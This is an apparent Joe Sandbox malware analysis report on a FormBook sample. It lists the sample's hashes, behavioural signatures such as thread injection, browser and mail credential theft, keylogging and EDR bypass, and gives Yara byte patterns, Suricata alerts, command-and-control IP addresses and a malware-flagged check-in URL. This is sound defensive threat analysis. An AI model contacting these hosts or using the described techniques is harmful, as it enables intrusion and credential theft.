Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r6lOHDg9N9.exe

Overview

General Information

Sample name:r6lOHDg9N9.exe
renamed because original name is a hash value
Original sample name:bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1.exe
Analysis ID:1549349
MD5:9f65c6e2192cc6757c1e7be556a4bc9a
SHA1:c3f40bc0b721df2ac07997098ef6d9a8a8b4d290
SHA256:bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • r6lOHDg9N9.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\r6lOHDg9N9.exe" MD5: 9F65C6E2192CC6757C1E7BE556A4BC9A)
    • svchost.exe (PID: 6236 cmdline: "C:\Users\user\Desktop\r6lOHDg9N9.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fZXsbVktlmkz.exe (PID: 1228 cmdline: "C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 7152 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • fZXsbVktlmkz.exe (PID: 4324 cmdline: "C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5024 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bed0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1406f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x484b1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x30650:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e313:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f113:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ParentImage: C:\Users\user\Desktop\r6lOHDg9N9.exe, ParentProcessId: 7072, ParentProcessName: r6lOHDg9N9.exe, ProcessCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ProcessId: 6236, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ParentImage: C:\Users\user\Desktop\r6lOHDg9N9.exe, ParentProcessId: 7072, ParentProcessName: r6lOHDg9N9.exe, ProcessCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ProcessId: 6236, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:22:20.383399+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449730TCP
            2024-11-05T15:22:51.689391+010020229301A Network Trojan was detected52.149.20.212443192.168.2.455453TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:22:56.464517+010020507451Malware Command and Control Activity Detected192.168.2.455454154.23.184.6080TCP
            2024-11-05T15:23:28.155331+010020507451Malware Command and Control Activity Detected192.168.2.455609209.74.95.2980TCP
            2024-11-05T15:23:41.940689+010020507451Malware Command and Control Activity Detected192.168.2.455686136.143.186.1280TCP
            2024-11-05T15:23:56.136508+010020507451Malware Command and Control Activity Detected192.168.2.455731133.130.35.9080TCP
            2024-11-05T15:24:09.525201+010020507451Malware Command and Control Activity Detected192.168.2.4557353.33.130.19080TCP
            2024-11-05T15:24:23.261899+010020507451Malware Command and Control Activity Detected192.168.2.45573931.31.196.1780TCP
            2024-11-05T15:24:36.778518+010020507451Malware Command and Control Activity Detected192.168.2.455743172.96.187.6080TCP
            2024-11-05T15:24:50.689017+010020507451Malware Command and Control Activity Detected192.168.2.455747161.97.142.14480TCP
            2024-11-05T15:25:04.198110+010020507451Malware Command and Control Activity Detected192.168.2.45575113.248.169.4880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:22:56.464517+010028554651A Network Trojan was detected192.168.2.455454154.23.184.6080TCP
            2024-11-05T15:23:28.155331+010028554651A Network Trojan was detected192.168.2.455609209.74.95.2980TCP
            2024-11-05T15:23:41.940689+010028554651A Network Trojan was detected192.168.2.455686136.143.186.1280TCP
            2024-11-05T15:23:56.136508+010028554651A Network Trojan was detected192.168.2.455731133.130.35.9080TCP
            2024-11-05T15:24:09.525201+010028554651A Network Trojan was detected192.168.2.4557353.33.130.19080TCP
            2024-11-05T15:24:23.261899+010028554651A Network Trojan was detected192.168.2.45573931.31.196.1780TCP
            2024-11-05T15:24:36.778518+010028554651A Network Trojan was detected192.168.2.455743172.96.187.6080TCP
            2024-11-05T15:24:50.689017+010028554651A Network Trojan was detected192.168.2.455747161.97.142.14480TCP
            2024-11-05T15:25:04.198110+010028554651A Network Trojan was detected192.168.2.45575113.248.169.4880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:23:20.484708+010028554641A Network Trojan was detected192.168.2.455564209.74.95.2980TCP
            2024-11-05T15:23:23.026740+010028554641A Network Trojan was detected192.168.2.455578209.74.95.2980TCP
            2024-11-05T15:23:25.564381+010028554641A Network Trojan was detected192.168.2.455594209.74.95.2980TCP
            2024-11-05T15:23:34.284729+010028554641A Network Trojan was detected192.168.2.455644136.143.186.1280TCP
            2024-11-05T15:23:36.834522+010028554641A Network Trojan was detected192.168.2.455659136.143.186.1280TCP
            2024-11-05T15:23:39.407521+010028554641A Network Trojan was detected192.168.2.455674136.143.186.1280TCP
            2024-11-05T15:23:48.464607+010028554641A Network Trojan was detected192.168.2.455722133.130.35.9080TCP
            2024-11-05T15:23:51.027181+010028554641A Network Trojan was detected192.168.2.455729133.130.35.9080TCP
            2024-11-05T15:23:53.581375+010028554641A Network Trojan was detected192.168.2.455730133.130.35.9080TCP
            2024-11-05T15:24:01.885452+010028554641A Network Trojan was detected192.168.2.4557323.33.130.19080TCP
            2024-11-05T15:24:05.324202+010028554641A Network Trojan was detected192.168.2.4557333.33.130.19080TCP
            2024-11-05T15:24:07.009732+010028554641A Network Trojan was detected192.168.2.4557343.33.130.19080TCP
            2024-11-05T15:24:15.620966+010028554641A Network Trojan was detected192.168.2.45573631.31.196.1780TCP
            2024-11-05T15:24:18.167829+010028554641A Network Trojan was detected192.168.2.45573731.31.196.1780TCP
            2024-11-05T15:24:20.714806+010028554641A Network Trojan was detected192.168.2.45573831.31.196.1780TCP
            2024-11-05T15:24:29.154609+010028554641A Network Trojan was detected192.168.2.455740172.96.187.6080TCP
            2024-11-05T15:24:31.721130+010028554641A Network Trojan was detected192.168.2.455741172.96.187.6080TCP
            2024-11-05T15:24:34.222625+010028554641A Network Trojan was detected192.168.2.455742172.96.187.6080TCP
            2024-11-05T15:24:42.790343+010028554641A Network Trojan was detected192.168.2.455744161.97.142.14480TCP
            2024-11-05T15:24:45.557370+010028554641A Network Trojan was detected192.168.2.455745161.97.142.14480TCP
            2024-11-05T15:24:48.166703+010028554641A Network Trojan was detected192.168.2.455746161.97.142.14480TCP
            2024-11-05T15:24:56.545697+010028554641A Network Trojan was detected192.168.2.45574813.248.169.4880TCP
            2024-11-05T15:24:59.100062+010028554641A Network Trojan was detected192.168.2.45574913.248.169.4880TCP
            2024-11-05T15:25:01.620535+010028554641A Network Trojan was detected192.168.2.45575013.248.169.4880TCP
            2024-11-05T15:25:10.405488+010028554641A Network Trojan was detected192.168.2.455752104.16.6.25380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: r6lOHDg9N9.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.030002304.xyz/jkxr/Avira URL Cloud: Label: malware
            Source: http://www.030002304.xyz/jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U=Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: r6lOHDg9N9.exeReversingLabs: Detection: 65%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: r6lOHDg9N9.exeJoe Sandbox ML: detected
            Source: r6lOHDg9N9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fZXsbVktlmkz.exe, 00000005.00000002.3551483374.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163431808.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001EC450 FindFirstFileW,FindNextFileW,FindClose,6_2_001EC450
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then xor eax, eax6_2_001D9BE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then mov ebx, 00000004h6_2_041F04E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55454 -> 154.23.184.60:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55454 -> 154.23.184.60:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55609 -> 209.74.95.29:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55609 -> 209.74.95.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55578 -> 209.74.95.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55564 -> 209.74.95.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55594 -> 209.74.95.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55644 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55674 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55722 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55733 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55735 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55735 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55739 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55739 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55747 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55747 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55729 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55737 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55740 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55736 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55731 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55731 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55738 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55744 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55749 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55730 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55741 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55742 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55746 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55743 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55743 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55751 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55751 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55748 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55745 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55659 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55752 -> 104.16.6.253:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55686 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55686 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55734 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55732 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55750 -> 13.248.169.48:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030002304.xyz
            Source: Joe Sandbox ViewIP Address: 209.74.95.29 209.74.95.29
            Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
